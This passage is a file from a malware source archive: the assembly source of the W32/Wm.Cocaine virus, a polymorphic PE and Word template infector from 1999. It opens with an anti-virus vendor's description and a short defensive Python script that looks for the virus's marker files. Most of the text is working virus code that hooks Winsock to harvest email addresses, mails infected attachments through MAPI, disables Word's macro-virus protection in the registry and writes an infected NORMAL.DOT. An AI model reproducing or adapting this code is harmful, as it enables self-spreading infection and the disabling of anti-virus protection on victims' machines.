MalwareSourceCode/Win32/Infector/Win32.Cocaine.asm
2020-10-16 23:26:21 +02:00

5768 lines
192 KiB

;Wm/W32.Cocaine - 22231 bytes
;(c) Vecna 1999
;
;This virus infects PE and DOC files.
;
;Study the code and the AVPVE description for other features.
;
;Small corrections in AVPVE text are between []'s
;
;
;
;AVPVE Description:
;
; Cocaine
;
; ------------------------------------------------------------------------
; This is a parasitic Windows PE files and MS Word normal templates infector
; with email spreading ability, about 22Kb of length. The virus has three
; instances: in Windows PE EXE files, in Word NORMAL template and as attached
; file in email messages.
;
; The virus code in infected PE EXE files is its main instance. When it is
; executed, the virus searches for PE EXE files in the current and Windows
; directories and infects them. The virus also drops an infected NORMAL.DOT
; to the MS Word directory from its PE EXE instance, as well as sends
; infected emails. The virus instance in the NORMAL template drops and
; executes the infected PE EXE file on each document closing, and is not able
; to infect other documents and templates. [* Wrong. Check the infected doc I
; included, or the file MACRO.INC for the code *] The virus code in emails
; appears as attached file that is an infected PE EXE Windows executable file
; with a random name, or infected NORMAL template.
;
; The virus is per-process memory resident. This means that the virus copy
; may stay in memory for a long time until the infected application
; terminates. In case only "short-life" applications are infected, the virus
; code is not present in the system memory for long time. In case an
; application in permanent use is infected, the virus is active during a long
; time, hooks Windows functions, infects PE EXE files that are accessed and
; sends email messages.
;
; The virus is polymorphic in PE files as well as in Word NORMAL template.
; The virus has two polymorphic engines in its EXE code: the first of them
; generates polymorphic decryption loop in infected PE EXE files, the second
; one makes the virus macro program in infected NORMAL.DOT polymorphic too.
;
; The virus has a payload routine that is executed when an infected file is
; run after four months when it was infected. [* 8 months... Maybe AAM 12
; confused AVers ;-) *] This routine displays message boxes that have the
; header "W32/Wm.Cocaine" and the text that is randomly selected from seven
; variants:
;
; Your life burn faster, obey your master...
; Chop your breakfast on a mirror...
; Veins that pump with fear, sucking darkest clear...
; Taste me you will see, more is all you need...
; I will occupy, I will help you die...
; I will run through you, now I rule you too...
; Master of Puppets, I'm pulling your strings...
;
; The virus pays attention to anti-virus programs and tries to disable them.
; Each time an infected file is executed and virus installs its per-process
; resident copy it looks for anti-virus data files in the current directory
; and deletes them. The names of these files look like follows: KERNEL.AVC,
; SIGN.DEF, FIND.DRV, NOD32.000, DSAVIO32.DLL, SCAN.DAT, VIRSCAN.DAT (AVP,
; DSAV, NOD, SCAN and other anti-virus data files). The virus also locates
; and terminates old version of AVP Monitor on-access scanner. [* Not so
; old ;-) *]
;
; The known virus version has bugs and cannot spread from Word macro instance
; to Windows executable. It also has a bug in PE EXE infection routine and
; corrupts some WinNT executable files. [* What can I say... is buggy :-) *]
;
; The virus has a "copyright" text:
;
; (c) Vecna
;
; Some virus routines (especially macro ones) are related to the "Fabi"
; multi-platform virus, and some infected files may be detected by the name
; of this virus. [* Probably, the loader, before it load the poly virus code,
; can be detected as Fabi *]
;
; Technical details
;
; The virus has quite large size for a program written in Assembler - about
; 22Kb, and has many routines that are quite interesting from a technical
; point of view.
;
; Running infected EXE
;
; When an infected file takes control the polymorphic decryption loops are
; executed. They decrypt the virus code layer-by-layer (the virus is
; encrypted by several loops - from two till five) and pass control to the
; virus installation routine. It is necessary to note that several virus
; blocks stay still encrypted. The virus decrypts and accesses them in case
; of need, and then encrypts back. These blocks are MS Word infection data
; and routine as well as PE EXE polymorphic engine.
;
; The virus installation routine looks for necessary Windows API functions
; addresses that are used by the virus later. The list of these functions is
; quite long, this is caused by list of things the virus does to spread
; itself. The functions list the virus looks for is below:
;
; Exported by    Functions list
; -----------    --------------
; KERNEL32.DLL:  GetProcAddress GetModuleHandleA CreateProcessA
;                CreateFileA WinExec CloseHandle LoadLibraryA FreeLibrary
;                CreateFileMappingA MapViewOfFile UnmapViewOfFile
;                FindFirstFileA FindNextFileA FindClose SetEndOfFile
;                VirtualAlloc VirtualFree GetSystemTime
;                GetWindowsDirectoryA GetSystemDirectoryA
;                GetCurrentDirectoryA SetFileAttributesA SetFileTime
;                ExitProcess GetCurrentProcess WriteProcessMemory WriteFile
;                DeleteFileA Sleep CreateThread GetFileSize SetFilePointer
; USER32.DLL:    MessageBoxA FindWindowA PostMessageA
; ADVAPI32:      RegSetValueExA RegCreateKeyExA RegOpenKeyExA
;                RegQueryValueExA RegCloseKey
; MAPI32.DLL:    MAPISendMail
;
; The virus gets these functions' addresses by the standard Windows virus
; trick: it locates the image on KERNEL32.DLL in the Windows memory, scans
; its Export table and gets addresses of two functions: GetModuleHandle and
; GetProcAddress [* The import table is searched while infecting a file for
; GetModuleHandle *]. By using these two functions the virus is then able
; to easily locate all addresses of other necessary functions. The most
; interesting feature of this routine is: this is the first virus that processes
; not only Win95/98 and WinNT addresses while looking for KERNEL32.DLL image,
; but pays attention for Win2000 addresses also [* If the host doesn't import
; GetModuleHandle this is *]
;
; The virus then locates and infects the MS Word, then searches for PE EXE
; files and also infects them, then hooks a set of system events (files and
; emails access) that is used to locate and infect more files as well as
; spread virus copy to the Internet in attached emails.
;
; Infecting MS Word
;
; The very first infection routine that is activated by the virus is its MS
; Word affecting routine, if it is installed in the system. First of all here
; the virus checks for C:\ANCEV.SYS file presence.
;
; The C:\ANCEV.SYS file ("ANCEV"="VECNA" written backward) has a special
; purpose. This file is created when the MS Word template infection routine
; completes. So, this file presence means that MS Word was located and
; NORMAL.DOT template was infected. In this case the virus while sending
; emails sends NORMAL.DOT template but not the infected EXE dropper [* I used
; to think that DOC files are less suspicious to send by email, but, after
; melissa's shits, EXE are better I guess *]
;
; So, the virus checks for this file at the very top of MS Word infection
; routine. If it does not exist, the virus continues infection. If this file
; is found, the virus randomly in one cases of ten continues infection, and
; in nine cases of ten leaves infection routine. This means that in one case
; of ten the MS Word NORMAL.DOT will be re-infected anyway [* This is done to
; avoid lamers creating a fake ANCEV.SYS to not have WinWord infected *].
;
; The virus then disables the Word VirusWarning protection by modifying the
; system registry keys where Word stores its settings:
;
; SOFTWARE\Microsoft\Office\8.0\Word\Options, EnableMacroVirusProtection
;
; The virus then gets Word's templates directory also by reading system
; registry:
;
; SOFTWARE\Microsoft\Office\8.0\Common\FileNew\LocalTemplates
;
; and deletes the NORMAL.DOT template in there, and then creates a new
; NORMAL.DOT template file - infected one. The infected NORMAL.DOT contains a
; small macro inside. This macro has "AutoExec" Word auto-name - it will be
; automatically executed on next Word startup and will import the main virus
; macro from the C:\COCAINE.SYS file.
;
; The C:\COCAINE.SYS file is created by the virus just after overwriting the
; NORMAL.DOT template. This SYS file is a text file that contains VBA
; program's source code. This source is extracted by the virus from its code,
; mixed with junk (polymorphic) VBA instructions and appended by infected PE
; EXE dropper converted to ASCII strings.
;
; So, the MS Word infection routine does its work in two steps. First of all
; the virus replaces the original NORMAL.DOT with a new one that contains the
; "AutoExec" macro program (loader) that imports complete virus code from the
; C:\COCAINE.SYS file, and completes by that porting virus code from PE EXE
; file to MS Word template.
;
; From Word to EXE
;
; To drop the PE EXE file from its Word template instance the virus uses a
; standard macro-viruses' trick. It creates two files: the first of them is
; the C:\COCAINE.SRC file with infected PE EXE file image converted to ASCII
; form, and second file is a DOS batch with random name. This batch file
; contains a set of instructions that execute the DOS DEBUG utility that
; converts ASCII dump back to binary PE EXE form, and executes it [* This is
; the worst imaginable way to drop an EXE file ever *]
;
; So the virus jumps to Windows out of infected Word template.
;
; Infecting PE EXE files
;
; When MS Word is affected, the virus goes to PE EXE files infection routine.
; The virus looks for PE EXE files in the current and Windows directories and
; infects them. The only files infected are those that have .EXE or .SCR
; filename extensions.
;
; The virus then looks for installed browser and mailer and infects them too.
; The virus locates them by system registry keys in HKEY_LOCAL_MACHINE
; storage:
;
; SOFTWARE\Classes\htmlfile\shell\open\command
; SOFTWARE\Classes\mailto\shell\open\command
;
; The virus needs these files to be infected for activating its Internet
; infection routines. When these Internet accessing applications are
; infected, the virus copy is active in the memory for a long time exactly at
; the moment a user is connected to the Internet. This is necessary to the
; virus to realize its Internet spreading ability.
;
; PE EXE Infection mechanism
;
; The virus checks several conditions before infecting the file. 1st: the
; file length has to be not divisible by 101 (it is virus protection to avoid
; multiple infection, the already infected PE EXE files have such length).
; 2nd: when the virus looks for EXE files in the current and Windows
; directories to infect them, the name of the file cannot contain 'V' letter
; or digits, here the virus avoids most popular anti-virus scanners and "goat
; files" infection.
;
; If the first section has big enough size (more than 2304 bytes), the virus
; writes to there several blocks of junk code that passes the control
; block-by-block to the main virus decryption loops. There are eight blocks
; written to files when the virus infects them:
;
; +------------+
; | |
; |PE Header | ---------------+
; +------------+ |
; | +-----+<-+| |
; | |Junk2| || |
; | +-----+-+|| Entry Point |
; |+-----+ |||<---------------+
; ||Junk1| |||
; |+-----+----+|
; | | |
; |+-----+<--+ |
; ||Junk3| |
; |+-----+----+|
; | V|
; | . . . |
; | +-----+|
; |+----|Junk8||
; || +-----+|
; |V |
; |------------|
; |Virus code |
; | |
; +------------+
;
; In this case the virus does not modify program's entry point address, but
; it needs to restore all overwritten blocks of host file before return
; control to original entry procedure [* CommanderBomber/OneHalf rulez *].
;
; If the first section is short, the control goes directly to virus code. In
; this case the virus modifies program's entry address to get control when
; infected files are executed.
;
; The virus code itself is encrypted by several (from two till five)
; polymorphic loops. The polymorphic engine in the virus is quite strong, and
; produces about 2Kb of polymorphic loops [* This poly is kewl *]
;
; The virus also patches the Import section to get functions GetProcAddress,
; GetModuleHandle, CreateProcessA, WinExec and MAPISendMail when infection
; executable is run.
;
; After all the virus writes its encrypted code to the end of last file
; section, and increases section size by patching PE header.
;
; Intercepting Events
;
; When the Word and PE EXE direct infection routines are complete, the virus
; hooks several Windows functions and stays in Windows memory as part of the
; host program. The virus hooks two file access function WinExec and
; CreateProcessA, if they are imported by the host program from the
; KERNEL32.DLL. When these functions get control (a program is executed) the
; virus gets the program's file name, gets its directory, searches and
; infects PE EXE files in this directory.
;
; Sending Emails
;
; The virus per-process resident code also runs email infection thread, hooks
; MAPISendMail that is exported from MAPI32.DLL, "connect" and "recv" from
; WSOCK32.DLL and GetProcAddress from KERNEL32.DLL.
;
; The first hook is used by the virus to send its copy to the Internet. When
; the virus intercepts this event it looks for attached data in the message.
; If there is no attach, the virus appends to the message infected NORMAL.DOT
; or infected PE EXE file (the latter is created on the disk in the
; C:\ENIACOC.SYS file).
;
; The "GetProcAddress", "connect" and "recv" hooks are used by the virus to
; realize second method of infected Emails sending. When a message arrives,
; the virus scans its header for "mailto:" field, gets the address from there
; and stores it in its own database. [* MAILTO: is a HTML command/instruction
; used very often. Nice idea :-) *]
;
; When taking control the infection thread looks for email address caught by
; "connect" and "recv" hooks, calculates its CRC and compares with its
; "already infected addresses" database that is stored in the BRSCBC.DAT file
; in the Windows system directory. If this address was not used yet, the
; virus adds it to its BRSCBC.DAT database, creates a message with NORMAL
; template or infected PE EXE file, and sends it by using MAPISendMail
; function [* Why BRSCBC? ;-) *]. The subject field for the message is
; randomly selected from variants:
;
; Kewl page!
; Improvement to your page
; Your page r0x0r!
; You must see this...
; Secret stuff!
; [* or an empty subject line *]
;
; By using the BRSCBC.DAT database the virus avoids duplicate sendings, but
; on each infected program run the virus depending on its random counter
; deletes this file, and clears "do-not-send" database by that.
;
; The "GetProcAddress" that is also hooked by virus TSR copy is used only to
; intercept "connect" and "recv" WSOCK32.DLL functions, if an application
; does not import these routines "by default", but activates them in case of
; need. To do that the "GetProcAddress" virus' hook intercepts accesses to
; "connect" and "recv" WSOCK32.DLL functions' addresses. If an application
; tries to get addresses of these routines to use Internet connections, the
; virus returns addresses of its own "connect" and "recv" hookers, and so
; intercepts Internet connection [* Fucking OPERA *]
;Thnz to IkX for accepting this contribution
;Greetz to Z0MBiE, VirusBuster and Reptile(the first to use macro autoload)
;Special greetz goes to Jacky Qwerty:
;Viruses would not be what they are today if it weren't for you!
;THNDV/CAP/Cabanas RULEZ! (THNDV only for the sharpest ones ;> )
;Big fuckZ to T2000 and El Gusano Boliviano: lamers and ripperz!!!!
;Greetz to all creative coders
;Use the pre-compiled virus, but if you're a sort of 37337 d00d... to compile:
; TASM /M /ML COKE.ASM
; TLINK32 COKE,,,IMPORT32
; PEWRSEC COKE.EXE
;Remember to split the big COKE.ASM in the smaller incz before!
;(and beware the trap ;> )
;contacts: vecna_br@hotmail.com (except questions about compiling)
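;Added example (not part of the original source or the AVPVE text): a triage
;script for the on-disk artefacts the description above names, namely the marker
;and work files and the "length divisible by 101" infection marker on .EXE/.SCR
;files. Function names and the directory arguments are assumptions of this example.

```python
"""Triage for on-disk artefacts named in the AVPVE description of W32/Wm.Cocaine."""
import os
import struct

# Marker and work files the description places in the root of C:.
ROOT_ARTEFACTS = ("ANCEV.SYS", "COCAINE.SYS", "COCAINE.SRC", "ENIACOC.SYS")
# Database of already-mailed address CRCs, kept in the Windows system directory.
SYSDIR_ARTEFACTS = ("BRSCBC.DAT",)
DIV_VALUE = 101                 # infected PE files have a length divisible by 101
TARGET_EXTS = (".exe", ".scr")  # the only extensions the infector touches


def is_pe(path):
    """True if the file has an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(0x40)
            if len(head) < 0x40 or head[:2] != b"MZ":
                return False
            (e_lfanew,) = struct.unpack_from("<I", head, 0x3C)
            fh.seek(e_lfanew)
            return fh.read(4) == b"PE\0\0"
    except OSError:
        return False


def find_artefacts(directory, names):
    """Case-insensitive lookup of the given file names directly in `directory`."""
    wanted = {n.upper() for n in names}
    try:
        entries = os.listdir(directory)
    except OSError:
        return []
    return sorted(os.path.join(directory, e) for e in entries if e.upper() in wanted)


def size_marker_candidates(directory):
    """PE .exe/.scr files whose length is a non-zero multiple of 101.

    About 1 in 101 clean files matches by chance, so a hit is a lead for a
    closer look (or a hash comparison against known-good media), not a verdict.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(directory):
        for name in files:
            if not name.lower().endswith(TARGET_EXTS):
                continue
            path = os.path.join(dirpath, name)
            try:
                size = os.path.getsize(path)
            except OSError:
                continue
            if size and size % DIV_VALUE == 0 and is_pe(path):
                hits.append(path)
    return sorted(hits)


def triage(drive_root, system_dir, scan_dirs):
    """Collect both kinds of finding into one report dictionary."""
    markers = find_artefacts(drive_root, ROOT_ARTEFACTS)
    markers += find_artefacts(system_dir, SYSDIR_ARTEFACTS)
    candidates = [p for d in scan_dirs for p in size_marker_candidates(d)]
    return {"marker_files": markers, "size_marker_pe": candidates}


if __name__ == "__main__":
    import sys
    # Usage: script.py <drive root> <system dir> <dir to scan> [...]
    if len(sys.argv) >= 4:
        report = triage(sys.argv[1], sys.argv[2], sys.argv[3:])
        for kind, paths in report.items():
            for p in paths:
                print(kind, p)
```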
.586p
.model flat, STDCALL
locals
include host.inc
ofs equ offset
by equ byte ptr
wo equ word ptr
dwo equ dword ptr
TRUE EQU 1
FALSE EQU 0
MAIL_DEBUG EQU FALSE
DIRECT EQU TRUE
MONTH_DELAY EQU 8
MAX_BRANCH EQU 8 ;beware DrWeb! (5 here=detect!)
MAX_M_DEEP EQU 6
MAIL_PRIORITY EQU 10 ;seconds
MAX_SOCK EQU 10
DIV_VALUE EQU 101
MAX_PATH EQU 260
MIN_RAW EQU (MAX_BRANCH+1)*100h
vsize equ vend - vcode
msize equ mend - vcode
_VSEG segment dword use32 public 'COCAINE'
IFNDEF I_AM_IDIOT_USER_THAT_CANT_COMPILE
vcode label
db '(c) Vecna', 0
FunDate db 0 ;month to activate
InitWSOCK proc
call @@1
wsock32 db 'WSOCK32.DLL', 0
@@1:
call [ebp+(ofs _GetModuleHandle-ofs vcode)]
test eax, eax
jz @@0
call @@2
db 'connect',0
@@2:
push eax
call @@3
db 'recv', 0
@@3:
push eax
call [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [ebp+(ofs _recv-ofs vcode)], eax
call [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [ebp+(ofs _connect-ofs vcode)], eax
clc
ret
@@0:
stc
ret
InitWSOCK endp
http_install proc
sub ecx, ecx
call @@set_seh
mov esp, [esp+8]
call delta
jmp @@fault
@@set_seh:
push dwo fs:[ecx]
mov fs:[ecx], esp
call InitWSOCK
jc @@fault
mov ebx, [ebp+(ofs _base-ofs vcode)]
@@check:
cmp wo [ebx], 'ZM'
je @@found
@@fault:
sub ecx, ecx
pop dwo fs:[ecx]
pop ecx
ret
@@found:
mov edi, [ebx+3ch]
lea edi, [ebx+edi+128]
mov edi, [edi]
@@2:
mov esi, [ebx+edi+12]
test esi, esi
jz @@ret
add esi, ebx
lodsd
or eax, 20202020h
cmp eax, 'cosw'
je @@wsock
add edi, 20
jmp @@2
@@wsock:
mov esi, [ebx+edi+16]
add esi, ebx
@@searchloop:
lodsd
test eax, eax
jz @@ret
cmp eax, [ebp+(ofs _connect-ofs vcode)]
jne @@3
lea eax, [ebp+(ofs New_connect-ofs vcode)]
lea edi, [esi-4]
mov ecx, 4
push esi
push eax
mov esi, esp ;fake buffer in stack
call WriteMem
pop esi
pop esi
@@3:
cmp eax, [ebp+(ofs _recv-ofs vcode)]
jne @@searchloop
lea eax, [ebp+(ofs New_recv-ofs vcode)]
lea edi, [esi-4]
mov ecx, 4
push esi
push eax
mov esi, esp ;fake buffer in stack
call WriteMem
pop esi
pop esi
@@ret:
jmp @@fault
http_install endp
NewGetProcAddress proc
push esp
pushad
call delta
mov eax, [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [esp+(7*4)+4], eax
call InitWSOCK
jc @@1
lea eax, [ebp+(ofs wsock32-ofs vcode)]
push eax
call [ebp+(ofs _GetModuleHandle-ofs vcode)]
test eax, eax
jz @@1
cmp [esp+(7*4)+12], eax
jnz @@1
lea eax, [ebp+(ofs CheckWSOCK32-ofs vcode)]
xchg [esp+(7*4)+8], eax
mov [ebp+(ofs wsock_ret-ofs vcode)], eax
@@1:
popad
ret
NewGetProcAddress endp
CheckWSOCK32 proc
push ebp
call delta
cmp eax, [ebp+(ofs _connect-ofs vcode)]
jne @@1
lea eax, [ebp+(ofs New_connect-ofs vcode)]
jmp @@2
@@1:
cmp eax, [ebp+(ofs _recv-ofs vcode)]
jne @@2
lea eax, [ebp+(ofs New_recv-ofs vcode)]
@@2:
pop ebp
push 12345678h
wsock_ret equ dwo $-4
ret
CheckWSOCK32 endp
New_connect proc
push esp
pushad
call delta
mov eax, [ebp+(ofs _connect-ofs vcode)]
mov [esp+(7*4)+4], eax
mov esi, [esp+(7*4)+16]
mov ax, wo [esi+2] ;port number
cmp ax, 5000h ;80
jne @@1
mov eax, [esp+(7*4)+12] ;get socket
mov ebx, [ebp+(ofs _socket-ofs vcode)]
mov [ebp+(ofs socket-ofs vcode)+(ebx*4)], eax
inc ebx
cmp ebx, MAX_SOCK
jne @@2
sub ebx, ebx
@@2:
mov [ebp+(ofs _socket-ofs vcode)], ebx
@@1:
popad
ret
New_connect endp
delta proc
call @@1
@@1:
pop ebp
sub ebp, (ofs @@1-ofs vcode)
ret
delta endp
New_recv proc
push esp
pushad
call delta
mov eax, [ebp+(ofs _recv-ofs vcode)]
mov [esp+(7*4)+4], eax
mov eax, [esp+(7*4)+12]
lea edi, [ebp+(ofs socket-ofs vcode)]
mov ecx, MAX_SOCK
repne scasd
jecxz @@1
mov eax, [esp+(7*4)+16]
mov [ebp+(ofs recv_buff-ofs vcode)], eax
mov eax, [esp+(7*4)+20]
mov [ebp+(ofs recv_size-ofs vcode)], eax
lea eax, [ebp+(ofs New_recv2-ofs vcode)]
xchg [esp+(7*4)+8], eax
mov [ebp+(ofs recv_ret-ofs vcode)], eax
@@1:
popad
ret
New_recv endp
New_recv2 proc
pushad
call delta
mov eax, [ebp+(ofs email_w-ofs vcode)]
test eax, eax
jnz @@0
mov esi, [ebp+(ofs recv_buff-ofs vcode)]
mov ecx, [ebp+(ofs recv_size-ofs vcode)]
sub ecx, 8
@@1:
push ecx
push esi
lodsd
or eax, 20202000h
cmp eax, 'iam"'
jne @@2
lodsd
or eax, 00202020h
cmp eax, ':otl'
jne @@2
lea edi, [ebp+(ofs email-ofs vcode)]
lea ebx, [edi+127]
@@4:
lodsb
cmp al, '"'
je @@3
cmp al, '?'
je @@3
cmp edi, ebx
je @@3
stosb
jmp @@4
@@3:
sub eax, eax
stosb
dec eax
mov dwo [ebp+(ofs email_w-ofs vcode)], eax
@@2:
pop esi
inc esi
pop ecx
loop @@1
@@0:
popad
push 12345678h
recv_ret equ dwo $-4
ret
New_recv2 endp
MailThread proc
cld
mov ebp, [esp+4]
sub eax, eax
call @@set_seh
mov esp, [esp+8]
call delta
push -1
call [ebp+(ofs _Sleep-ofs vcode)]
@@set_seh:
push dwo fs:[eax]
mov fs:[eax], esp
@@main_loop:
mov ecx, [ebp+(ofs email_w-ofs vcode)]
test ecx, ecx
jz @@no_queued
lea esi, [ebp+(ofs email-ofs vcode)]
push esi
sub ecx, ecx
cld
@@1strlen:
lodsb
test al, al
jz @@2strlen
inc ecx
jmp @@1strlen
@@2strlen:
mov edi, ecx
pop esi
call CRC32
mov [ebp+(ofs email_crc-ofs vcode)], eax
call CheckList
test eax, eax
jnz @@done
IF MAIL_DEBUG EQ TRUE
sub ecx, ecx
push 4 ;yes/no
lea eax, [ebp+(ofs title1-ofs vcode)]
push eax
lea eax, [ebp+(ofs email-ofs vcode)]
push eax
push ecx
call [ebp+(ofs _MessageBoxA-ofs vcode)]
cmp eax, 7 ;no!
je @@done
ENDIF
lea eax, [ebp+(ofs mapi-ofs vcode)]
push eax
call [ebp+(ofs _LoadLibraryA-ofs vcode)]
test eax, eax
jz @@done
mov [ebp+(ofs _mapi-ofs vcode)], eax
lea ecx, [ebp+(ofs sMAPISendMail-ofs vcode)]
push ecx
push eax
call [ebp+(ofs _GetProcAddress-ofs vcode)]
test eax, eax
jz @@unload_mapi
mov [ebp+(ofs _MAPISendMail-ofs vcode)], eax
call OpenAncev
jc @@file ;file doesn't exist, binary send
@@doc:
call GetTemplateDir
@@1:
lodsb
test al, al
jnz @@1
lea edi, [esi-1]
lea esi, [ebp+(ofs ndot-ofs vcode)]
@@3:
lodsb
stosb
test al, al
jnz @@3
lea esi, [ebp+(ofs directory-ofs vcode)]
push 80h
push esi
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
test eax, eax
jz @@file
mov edx, 'COD.'
jmp @@attach
@@file:
call CreateDropper
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
push eax ;buffer
mov eax, [ebp+(ofs fsizel-ofs vcode)]
push eax ;size
lea edi, [ebp+(ofs directory-ofs vcode)]
push edi
lea esi, [ebp+(ofs shitfile-ofs vcode)]
@@4:
lodsb
stosb
test al, al
jnz @@4
mov dwo [ebp+(ofs wd_att-ofs vcode)], 82h
call WriteDump ;hidden dump
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)]
mov edx, 'EXE.'
@@attach:
DATA_SIZE = size MapiMessage + ((size MapiRecipDesc)*2) + size MapiFileDesc
mapimsg = 0
origin = mapimsg + size MapiMessage
destin = origin + size MapiRecipDesc
file = destin + size MapiRecipDesc
sub eax, eax
mov ecx, DATA_SIZE
sub esp, ecx
mov edi, esp
mov esi, edi
rep stosb ;clear buffers we'll use
lea eax, [esi+origin]
mov [esi.mapimsg.lpOriginator], eax
lea eax, [esi+destin]
mov [esi.mapimsg.lpRecips], eax
lea eax, [esi+file]
mov [esi.mapimsg.lpFiles], eax
push 1
pop eax
mov [esi.mapimsg.nFileCount], eax
mov [esi.mapimsg.nRecipCount], eax
mov [esi.destin.ulRecipClass], eax
inc eax
mov [esi.mapimsg.flags], eax
lea eax, [ebp+(ofs email-ofs vcode)]
mov [esi.destin.lpszName], eax
mov [esi.destin.lpszAddress], eax
lea eax, [ebp+(ofs directory-ofs vcode)]
mov [esi.file.lpszPathName], eax
lea edi, [ebp+(ofs fname-ofs vcode)]
mov [esi.file.lpszFileName], edi
call MakeVar
mov eax, edx
stosd
sub eax, eax
stosb
mov eax, [ebp+(ofs subject-ofs vcode)]
mov [esi.mapimsg.lpszSubject], eax
call @@1aa
db '', 0
@@1aa:
pop [esi.mapimsg.lpszNoteText]
sub eax, eax
push eax
push eax
push esi
push eax
push eax
call [ebp+(ofs _MAPISendMail-ofs vcode)]
test eax, eax
jnz @@33
sub eax, eax
mov [ebp+(ofs mm_on_off-ofs vcode)], eax
call InsertList
@@33:
add esp, DATA_SIZE
lea eax, [ebp+(ofs shitfile-ofs vcode)]
push eax
call DeleteShitFile
@@unload_mapi:
mov eax, [ebp+(ofs _mapi-ofs vcode)]
call [ebp+(ofs _FreeLibrary-ofs vcode)]
@@done:
sub eax, eax
mov [ebp+(ofs email_w-ofs vcode)], eax
@@no_queued:
push MAIL_PRIORITY*1000
call [ebp+(ofs _Sleep-ofs vcode)]
jmp @@main_loop
MailThread endp
GetTemplateDir proc
call @@2
db 'SOFTWARE\Microsoft\Office\8.0\Common\FileNew\LocalTemplates', 0
@@2:
pop eax
call ConsultKey
ret
GetTemplateDir endp
CreateDropper proc
push 00000040h
push 00002000h+00001000h+00100000h
push 48*1024
push 0
call [ebp+(ofs _VirtualAlloc-ofs vcode)]
mov [ebp+(ofs mm_on_off-ofs vcode)], eax
sub edi, edi
xchg edi, eax
call @@1
@@0:
@@1:
pop esi
mov ecx, ofs @@1-ofs @@0
@@2:
lodsb
stosb
test al, al
jnz @@3
dec ecx
dec ecx
lodsw
push ecx
xor ecx, ecx
xchg ecx, eax
jecxz @@4
rep stosb
@@4:
pop ecx
@@3:
loop @@2
mov [ebp+(ofs fsizeh-ofs vcode)], ecx
mov dwo [ebp+(ofs fsizel-ofs vcode)], 4096
call Infect
ret
CreateDropper endp
random_f proc
push eax
call random0
pop eax
ret
random_f endp
macro_start equ this byte
include ndot.inc
MacroSpread proc
sub ecx, ecx
call @@set_seh
mov esp, [esp+8]
call delta
jmp @@0
@@set_seh:
push dwo fs:[ecx]
mov fs:[ecx], esp
call OpenAncev
jc @@1 ;doesn't exist, macro spread
mov eax, 10
call random
or eax, eax ;just in case that we are
jnz @@0 ;reinfecting
@@1:
call @@2
@@1v dd 0
@@2:
push 000F003Fh ;KEY_ALL_ACCESS
push 0
call @@3
db 'SOFTWARE\Microsoft\Office\8.0\Word\Options', 0
@@3:
push 80000001H ;HKEY_CURRENT_USER
call [ebp+(ofs _RegOpenKeyEx-ofs vcode)]
test eax, eax
jnz @@0
push 1 ;size
call @@4
db '0', 0
@@4:
push 1 ;type
push 0
call @@5
db 'EnableMacroVirusProtection', 0 ;key entry
@@5:
push dwo [ebp+(ofs @@1v-ofs vcode)]
call [ebp+(ofs _RegSetValueEx-ofs vcode)]
push dwo [ebp+(ofs @@1v-ofs vcode)]
call [ebp+(ofs _RegCloseKey-ofs vcode)] ;close key
call GetTemplateDir
cld
push esi
@@6:
lodsb
test al, al
jnz @@6
lea edi, [esi-1]
lea esi, [ebp+(ofs ndot-ofs vcode)]
@@8:
lodsb
stosb
test al, al
jnz @@8
call DeleteShitFile
push 00000040h
push 00002000h+00001000h+00100000h
push 48*1024
push 0
call [ebp+(ofs _VirtualAlloc-ofs vcode)];alloc memory for my normal.dot
mov [ebp+(ofs mm_on_off-ofs vcode)], eax
lea eax, [ebp+(ofs normaldot-ofs vcode)]
push eax
push normaldot_size
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
push eax
lea eax, [ebp+(ofs normaldot_sized-ofs vcode)]
push eax
call lzrw1_decompress ;unpack normaldot
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
push eax
mov eax, [ebp+(ofs normaldot_sized-ofs vcode)]
push eax
lea eax, [ebp+(ofs directory-ofs vcode)]
push eax ;dump not hidden
mov dwo [ebp+(ofs wd_att-ofs vcode)], 80h
call WriteDump ;create/write new normal.dot
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from normal.dot
call CreateDropper
push 00000040h
push 00002000h+00001000h+00100000h
push 150*1024
push 0
call [ebp+(ofs _VirtualAlloc-ofs vcode)]
mov [ebp+(ofs dbgscript-ofs vcode)], eax
mov edi, eax
push eax
mov esi, [ebp+(ofs mm_on_off-ofs vcode)]
mov ecx, dwo [ebp+(ofs fsizel-ofs vcode)]
call script ;make debug script
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from EXE dropper
pop eax
sub edi, eax
mov [ebp+(ofs dbgscript_size-ofs vcode)], edi
push 00000040h
push 00002000h+00001000h+00100000h
push 4*1024
push 0
call [ebp+(ofs _VirtualAlloc-ofs vcode)] ;alloc memory for macro text
mov [ebp+(ofs mm_on_off-ofs vcode)], eax
lea eax, [ebp+(ofs macros-ofs vcode)]
push eax
push macro_size
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
push eax
lea eax, [ebp+(ofs macro_sized-ofs vcode)]
push eax
call lzrw1_decompress ;unpack normaldot
mov ecx, [ebp+(ofs macro_sized-ofs vcode)]
mov esi, [ebp+(ofs mm_on_off-ofs vcode)]
lea edi, [esi+ecx+4] ;edi=buffer for vars
mov [ebp+(ofs variables-ofs vcode)], edi
mov ebx, edi
@@9:
lodsb
cmp al, 'A'
jb @@10
cmp al, 'Z'
ja @@10
call random_f
jc @@10
sub al, 'A'-'a'
@@10:
mov [esi-1], al
loop @@9
mov ecx, 10 ;generate variables
@@13:
push ecx
mov eax, 8 ;length of the name of variable
call random
inc eax
inc eax
mov ecx, eax
@@12:
mov eax, 'Z'-'A'
call random
add al, 'A'
call random_f
jc @@11
sub al, 'A'-'a'
@@11:
stosb
loop @@12
sub eax, eax
stosb
pop ecx
loop @@13 ;next variable
push 00000040h
push 00002000h+00001000h+00100000h
push 4*1024
push 0
